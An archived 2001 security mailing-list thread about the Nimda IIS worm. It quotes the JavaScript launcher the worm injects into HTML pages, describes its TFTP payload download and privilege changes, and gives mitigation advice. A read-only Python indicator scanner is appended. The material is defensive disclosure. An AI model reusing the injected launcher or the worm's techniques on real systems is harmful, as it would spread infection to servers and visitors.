-----Original Message-----
From: Simon Clausen [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:49 AM
To: [EMAIL PROTECTED]
Subject: Re: Alert: Some sort of IIS worm seems to be propagating

Sent on behalf of Rich Zuris ([EMAIL PROTECTED]) due to his network being taken offline by the worm.

Following is a list of recorded changes made to NT4 SP6a with Q299444 rollup security patches.

The following is appended to EVERY HTML file on the machine:

    window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

Just about every directory on the machine has one or more files with extension .eml, mostly readme.eml but also other names that seem to correspond to directory or other filenames. Total of 1234 .eml files created, totalling 98Mb (about 78Kb each).

Also got 55 files with extension .nws, containing exact same content. Both .eml and .nws files can be opened by Outlook Express.

Virus makes numerous outbound connections to port 80 to propagate itself to other servers.

Virus sets IE5 to IE4 compatibility mode (apparently to circumvent security) and crashes Explorer.exe when IE is launched. IExplore.exe appears to be hacked, and there is now a hidden "IExplore .exe" (note the space before the extension) in the same directory.

Virus code in stealth executable file with name tftp###, where ### is any numeric string. File has no extension, but it is definitely a Windows executable. This file is placed into \Program Files\Common Files\System\MSADC, and in the same directory Admin.dll appears to be hacked.

IIS console hacked: new MMC.EXE placed in \WINNT directory, which may override original version in \WINNT\System32.

EXE files placed into TEMP directory. Note that most/all hacked EXE files are flagged Hidden.

Riched20.dll files placed in random directories (not on PATH, not containing executables).

NT Account "Guest" was made a member of the NT "Administrators" group!
Regards,
Simon Clausen

-----Original Message-----
From: Windows NTBugtraq Mailing List [mailto:[EMAIL PROTECTED]] On Behalf Of Russ
Sent: Wednesday, 19 September 2001 1:21 AM
To: [EMAIL PROTECTED]
Subject: Alert: Some sort of IIS worm seems to be propagating

There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS. It appears that the attacks can come both from email and from the network.

A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box. Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the /scripts directory), please forward me a copy of that .dll ASAP. Also, look for TFTP traffic (UDP 69).

As a safeguard, consider doing the following: edit %systemroot%/system32/drivers/etc/services and change the line

    tftp 69/udp

to

    tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so it can't be removed.

More information as it arises.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=20360&t=20360
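The host-side indicators quoted in the two messages above (the window.open launcher appended to HTML pages, the readme.eml/.nws copies, the extension-less tftp### executable and the "IExplore .exe" name with a space) can be swept for with a small read-only scan. The script below is an added example and is not part of either post; the scanned extensions, the 4 KB tail window and the "MZ" header check are assumptions made here for the example.

```python
"""Scan a directory tree for the Nimda host artifacts described in the posts above."""
import os
import re
from pathlib import Path

# Indicators taken from the reports; the limits below are assumptions for this example.
HTML_MARKER = b'window.open("readme.eml"'
HTML_EXTS = {".html", ".htm", ".asp"}      # page types the worm was seen appending to
MAIL_EXTS = {".eml", ".nws"}               # copies of the worm's own mail message
TFTP_DROPPER = re.compile(r"^tftp\d+$", re.IGNORECASE)  # tftp### with no extension
TAIL_BYTES = 4096                          # the launcher is appended at the end of a page


def is_pe(path):
    """True if the file starts with the 'MZ' DOS header every Windows executable carries."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"MZ"
    except OSError:
        return False


def scan_tree(root):
    """Walk root and return a dict of indicator name -> list of matching paths."""
    found = {"html_injected": [], "eml_nws": [], "tftp_dropper": [], "space_ext": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath, name)
            ext = path.suffix.lower()
            if ext in HTML_EXTS:
                # the injected launcher sits at the very end of the page, so only the tail matters
                try:
                    tail = path.read_bytes()[-TAIL_BYTES:]
                except OSError:
                    continue
                if HTML_MARKER in tail:
                    found["html_injected"].append(str(path))
            elif ext in MAIL_EXTS:
                found["eml_nws"].append(str(path))
            elif ext == "" and TFTP_DROPPER.match(name) and is_pe(path):
                # an extension-less tftp### file that is really a Windows executable
                found["tftp_dropper"].append(str(path))
            # "IExplore .exe": a space before the extension marks the second, hidden copy
            if name.lower().endswith(" .exe"):
                found["space_ext"].append(str(path))
    return found
```

Call scan_tree() on the web root and the \Program Files\Common Files\System\MSADC directory named in the report; the Hidden attribute and the Guest-in-Administrators change are not covered here and need to be checked separately.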